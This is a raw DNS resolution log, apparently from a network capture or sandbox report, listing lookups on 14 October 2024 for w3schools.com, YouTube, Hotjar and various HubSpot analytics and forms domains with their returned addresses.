                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:47.165851116 CEST1.1.1.1192.168.2.70xb523No error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:47.165851116 CEST1.1.1.1192.168.2.70xb523No error (0)cs837.wac.edgecastcdn.net192.229.133.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:47.169624090 CEST1.1.1.1192.168.2.70x24d9No error (0)www.w3schools.comcs837.wac.edgecastcdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:47.813148022 CEST1.1.1.1192.168.2.70xed28No error (0)static.hsappstatic.net104.17.175.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:47.813148022 CEST1.1.1.1192.168.2.70xed28No error (0)static.hsappstatic.net104.17.173.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:47.813148022 CEST1.1.1.1192.168.2.70xed28No error (0)static.hsappstatic.net104.17.172.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:47.813148022 CEST1.1.1.1192.168.2.70xed28No error (0)static.hsappstatic.net104.17.174.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:47.813148022 CEST1.1.1.1192.168.2.70xed28No error (0)static.hsappstatic.net104.17.176.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:47.815045118 CEST1.1.1.1192.168.2.70x4cc7No error (0)static.hsappstatic.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.610657930 CEST1.1.1.1192.168.2.70x9b0bNo error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.610657930 CEST1.1.1.1192.168.2.70x9b0bNo error (0)static-cdn.hotjar.com18.66.102.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.610657930 CEST1.1.1.1192.168.2.70x9b0bNo error (0)static-cdn.hotjar.com18.66.102.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.610657930 CEST1.1.1.1192.168.2.70x9b0bNo error (0)static-cdn.hotjar.com18.66.102.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.610657930 CEST1.1.1.1192.168.2.70x9b0bNo error (0)static-cdn.hotjar.com18.66.102.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.611895084 CEST1.1.1.1192.168.2.70xa768No error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.719100952 CEST1.1.1.1192.168.2.70x457No error (0)static.hsappstatic.net104.17.176.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.719100952 CEST1.1.1.1192.168.2.70x457No error (0)static.hsappstatic.net104.17.174.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.719100952 CEST1.1.1.1192.168.2.70x457No error (0)static.hsappstatic.net104.17.175.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.719100952 CEST1.1.1.1192.168.2.70x457No error (0)static.hsappstatic.net104.17.172.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.719100952 CEST1.1.1.1192.168.2.70x457No error (0)static.hsappstatic.net104.17.173.91A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:48.719306946 CEST1.1.1.1192.168.2.70xc4f7No error (0)static.hsappstatic.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com216.58.206.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com172.217.23.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com142.250.186.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com172.217.18.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com142.250.186.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com142.250.186.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com142.250.185.174A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com142.250.186.110A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com142.250.184.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com172.217.16.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com216.58.212.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com142.250.186.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com216.58.206.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com172.217.16.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com142.250.181.238A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560789108 CEST1.1.1.1192.168.2.70x60ebNo error (0)youtube-ui.l.google.com172.217.18.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560895920 CEST1.1.1.1192.168.2.70x476dNo error (0)script.hotjar.com13.33.187.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560895920 CEST1.1.1.1192.168.2.70x476dNo error (0)script.hotjar.com13.33.187.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560895920 CEST1.1.1.1192.168.2.70x476dNo error (0)script.hotjar.com13.33.187.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.560895920 CEST1.1.1.1192.168.2.70x476dNo error (0)script.hotjar.com13.33.187.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.561245918 CEST1.1.1.1192.168.2.70xf444No error (0)www.youtube.comyoutube-ui.l.google.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:50.561245918 CEST1.1.1.1192.168.2.70xf444No error (0)youtube-ui.l.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.036282063 CEST1.1.1.1192.168.2.70xaa25No error (0)js.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.036540985 CEST1.1.1.1192.168.2.70x8dddNo error (0)js.hubspot.com104.16.117.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.036540985 CEST1.1.1.1192.168.2.70x8dddNo error (0)js.hubspot.com104.16.118.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.041990995 CEST1.1.1.1192.168.2.70x2df7No error (0)js.usemessages.com104.16.78.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.041990995 CEST1.1.1.1192.168.2.70x2df7No error (0)js.usemessages.com104.16.76.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.041990995 CEST1.1.1.1192.168.2.70x2df7No error (0)js.usemessages.com104.16.77.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.041990995 CEST1.1.1.1192.168.2.70x2df7No error (0)js.usemessages.com104.16.79.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.041990995 CEST1.1.1.1192.168.2.70x2df7No error (0)js.usemessages.com104.16.75.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.042987108 CEST1.1.1.1192.168.2.70x27f8No error (0)js.usemessages.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.043282032 CEST1.1.1.1192.168.2.70xe278No error (0)js.hs-analytics.net104.16.160.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.043282032 CEST1.1.1.1192.168.2.70xe278No error (0)js.hs-analytics.net104.17.175.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.043534994 CEST1.1.1.1192.168.2.70x9c91No error (0)js.hs-analytics.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.044132948 CEST1.1.1.1192.168.2.70xd377No error (0)js.hsleadflows.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.045022011 CEST1.1.1.1192.168.2.70x2f5cNo error (0)js.hsleadflows.net104.18.139.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.045022011 CEST1.1.1.1192.168.2.70x2f5cNo error (0)js.hsleadflows.net104.18.137.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.045022011 CEST1.1.1.1192.168.2.70x2f5cNo error (0)js.hsleadflows.net104.18.141.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.045022011 CEST1.1.1.1192.168.2.70x2f5cNo error (0)js.hsleadflows.net104.18.140.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.045022011 CEST1.1.1.1192.168.2.70x2f5cNo error (0)js.hsleadflows.net104.18.138.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.045279026 CEST1.1.1.1192.168.2.70x6561No error (0)js.hsadspixel.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.045416117 CEST1.1.1.1192.168.2.70x752aNo error (0)js.hs-banner.com172.64.147.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.045416117 CEST1.1.1.1192.168.2.70x752aNo error (0)js.hs-banner.com104.18.40.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.045979023 CEST1.1.1.1192.168.2.70xc056No error (0)js.hsadspixel.net104.17.223.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.045979023 CEST1.1.1.1192.168.2.70xc056No error (0)js.hsadspixel.net104.17.128.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.046740055 CEST1.1.1.1192.168.2.70x478cNo error (0)js.hs-banner.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.046901941 CEST1.1.1.1192.168.2.70x2793No error (0)js.hscollectedforms.net104.16.107.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.046901941 CEST1.1.1.1192.168.2.70x2793No error (0)js.hscollectedforms.net104.16.110.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.046901941 CEST1.1.1.1192.168.2.70x2793No error (0)js.hscollectedforms.net104.16.109.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.046901941 CEST1.1.1.1192.168.2.70x2793No error (0)js.hscollectedforms.net104.16.111.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.046901941 CEST1.1.1.1192.168.2.70x2793No error (0)js.hscollectedforms.net104.16.108.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.048038960 CEST1.1.1.1192.168.2.70x9773No error (0)js.hscollectedforms.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.048181057 CEST1.1.1.1192.168.2.70x1ab0No error (0)app.hubspot.com104.16.117.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.048181057 CEST1.1.1.1192.168.2.70x1ab0No error (0)app.hubspot.com104.16.118.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.049518108 CEST1.1.1.1192.168.2.70x568fNo error (0)app.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.131299973 CEST1.1.1.1192.168.2.70xdccfNo error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.131299973 CEST1.1.1.1192.168.2.70xdccfNo error (0)static-cdn.hotjar.com18.66.102.51A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.131299973 CEST1.1.1.1192.168.2.70xdccfNo error (0)static-cdn.hotjar.com18.66.102.106A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.131299973 CEST1.1.1.1192.168.2.70xdccfNo error (0)static-cdn.hotjar.com18.66.102.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.131299973 CEST1.1.1.1192.168.2.70xdccfNo error (0)static-cdn.hotjar.com18.66.102.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:51.132194996 CEST1.1.1.1192.168.2.70xd132No error (0)static.hotjar.comstatic-cdn.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:52.710581064 CEST1.1.1.1192.168.2.70x1dafNo error (0)forms-na1.hsforms.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:52.710753918 CEST1.1.1.1192.168.2.70x6602No error (0)forms-na1.hsforms.com104.19.175.188A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:52.710753918 CEST1.1.1.1192.168.2.70x6602No error (0)forms-na1.hsforms.com104.18.80.204A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.150357008 CEST1.1.1.1192.168.2.70x73a3No error (0)cta-service-cms2.hubspot.com104.16.118.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.150357008 CEST1.1.1.1192.168.2.70x73a3No error (0)cta-service-cms2.hubspot.com104.16.117.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.150852919 CEST1.1.1.1192.168.2.70xb8dcNo error (0)cta-service-cms2.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.165191889 CEST1.1.1.1192.168.2.70xf9f4No error (0)js.hubspot.com104.16.118.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.165191889 CEST1.1.1.1192.168.2.70xf9f4No error (0)js.hubspot.com104.16.117.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.165282011 CEST1.1.1.1192.168.2.70xb67eNo error (0)js.hubspot.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.167629957 CEST1.1.1.1192.168.2.70xaa97No error (0)js.hscollectedforms.net104.16.109.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.167629957 CEST1.1.1.1192.168.2.70xaa97No error (0)js.hscollectedforms.net104.16.110.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.167629957 CEST1.1.1.1192.168.2.70xaa97No error (0)js.hscollectedforms.net104.16.108.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.167629957 CEST1.1.1.1192.168.2.70xaa97No error (0)js.hscollectedforms.net104.16.107.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.167629957 CEST1.1.1.1192.168.2.70xaa97No error (0)js.hscollectedforms.net104.16.111.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.168004036 CEST1.1.1.1192.168.2.70xd3a8No error (0)js.hscollectedforms.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.174649954 CEST1.1.1.1192.168.2.70x2196No error (0)js.hsleadflows.net104.18.138.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.174649954 CEST1.1.1.1192.168.2.70x2196No error (0)js.hsleadflows.net104.18.139.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.174649954 CEST1.1.1.1192.168.2.70x2196No error (0)js.hsleadflows.net104.18.141.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.174649954 CEST1.1.1.1192.168.2.70x2196No error (0)js.hsleadflows.net104.18.137.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.174649954 CEST1.1.1.1192.168.2.70x2196No error (0)js.hsleadflows.net104.18.140.17A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.176374912 CEST1.1.1.1192.168.2.70x4913No error (0)js.hsleadflows.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.179297924 CEST1.1.1.1192.168.2.70x437cNo error (0)js.usemessages.com104.16.76.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.179297924 CEST1.1.1.1192.168.2.70x437cNo error (0)js.usemessages.com104.16.75.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.179297924 CEST1.1.1.1192.168.2.70x437cNo error (0)js.usemessages.com104.16.79.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.179297924 CEST1.1.1.1192.168.2.70x437cNo error (0)js.usemessages.com104.16.78.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.179297924 CEST1.1.1.1192.168.2.70x437cNo error (0)js.usemessages.com104.16.77.142A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.180633068 CEST1.1.1.1192.168.2.70x5187No error (0)js.hsadspixel.net104.17.223.152A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.180633068 CEST1.1.1.1192.168.2.70x5187No error (0)js.hsadspixel.net104.17.128.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.181799889 CEST1.1.1.1192.168.2.70x2c87No error (0)js.hsadspixel.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.181811094 CEST1.1.1.1192.168.2.70x7926No error (0)js.usemessages.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.185870886 CEST1.1.1.1192.168.2.70x5fe9No error (0)js.hs-banner.com104.18.40.240A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.185870886 CEST1.1.1.1192.168.2.70x5fe9No error (0)js.hs-banner.com172.64.147.16A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.185970068 CEST1.1.1.1192.168.2.70x7388No error (0)js.hs-banner.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.191320896 CEST1.1.1.1192.168.2.70xb651No error (0)js.hs-analytics.net104.17.175.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.191320896 CEST1.1.1.1192.168.2.70xb651No error (0)js.hs-analytics.net104.16.160.168A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.191508055 CEST1.1.1.1192.168.2.70x2cb5No error (0)js.hs-analytics.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.192698956 CEST1.1.1.1192.168.2.70xb094No error (0)script.hotjar.com13.33.187.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.192698956 CEST1.1.1.1192.168.2.70xb094No error (0)script.hotjar.com13.33.187.74A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.192698956 CEST1.1.1.1192.168.2.70xb094No error (0)script.hotjar.com13.33.187.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.192698956 CEST1.1.1.1192.168.2.70xb094No error (0)script.hotjar.com13.33.187.109A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.239882946 CEST1.1.1.1192.168.2.70xcfNo error (0)ws.hotjar.comwsky-live.live.eks.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.240155935 CEST1.1.1.1192.168.2.70x8943No error (0)ws.hotjar.comwsky-live.live.eks.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.240155935 CEST1.1.1.1192.168.2.70x8943No error (0)wsky-live.live.eks.hotjar.com99.80.69.237A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.240155935 CEST1.1.1.1192.168.2.70x8943No error (0)wsky-live.live.eks.hotjar.com54.228.222.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.240155935 CEST1.1.1.1192.168.2.70x8943No error (0)wsky-live.live.eks.hotjar.com52.213.43.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.240155935 CEST1.1.1.1192.168.2.70x8943No error (0)wsky-live.live.eks.hotjar.com54.220.242.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.240155935 CEST1.1.1.1192.168.2.70x8943No error (0)wsky-live.live.eks.hotjar.com52.214.218.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.240155935 CEST1.1.1.1192.168.2.70x8943No error (0)wsky-live.live.eks.hotjar.com52.214.221.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.240155935 CEST1.1.1.1192.168.2.70x8943No error (0)wsky-live.live.eks.hotjar.com54.154.81.10A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.240155935 CEST1.1.1.1192.168.2.70x8943No error (0)wsky-live.live.eks.hotjar.com99.80.200.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.320266008 CEST1.1.1.1192.168.2.70x1f7dNo error (0)content.hotjar.iopacman-content-live.live.eks.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.320790052 CEST1.1.1.1192.168.2.70x5a02No error (0)content.hotjar.iopacman-content-live.live.eks.hotjar.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.320790052 CEST1.1.1.1192.168.2.70x5a02No error (0)pacman-content-live.live.eks.hotjar.com54.171.225.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.320790052 CEST1.1.1.1192.168.2.70x5a02No error (0)pacman-content-live.live.eks.hotjar.com34.248.145.195A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.320790052 CEST1.1.1.1192.168.2.70x5a02No error (0)pacman-content-live.live.eks.hotjar.com18.203.150.108A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.338820934 CEST1.1.1.1192.168.2.70x8979Server failure (2)p.adsymptotic.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.433875084 CEST1.1.1.1192.168.2.70x8164No error (0)forms.hscollectedforms.net104.16.107.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.433875084 CEST1.1.1.1192.168.2.70x8164No error (0)forms.hscollectedforms.net104.16.109.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.433875084 CEST1.1.1.1192.168.2.70x8164No error (0)forms.hscollectedforms.net104.16.111.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.433875084 CEST1.1.1.1192.168.2.70x8164No error (0)forms.hscollectedforms.net104.16.110.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.433875084 CEST1.1.1.1192.168.2.70x8164No error (0)forms.hscollectedforms.net104.16.108.254A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.434017897 CEST1.1.1.1192.168.2.70x188eNo error (0)forms.hscollectedforms.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.471297026 CEST1.1.1.1192.168.2.70x2a5bNo error (0)forms-na1.hsforms.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Oct 14, 2024 11:12:53.477715969 CEST1.1.1.1192.168.2.70xd06eNo error (0)forms-na1.hsforms.com104.18.80.204A (IP address)IN (0x0001)false
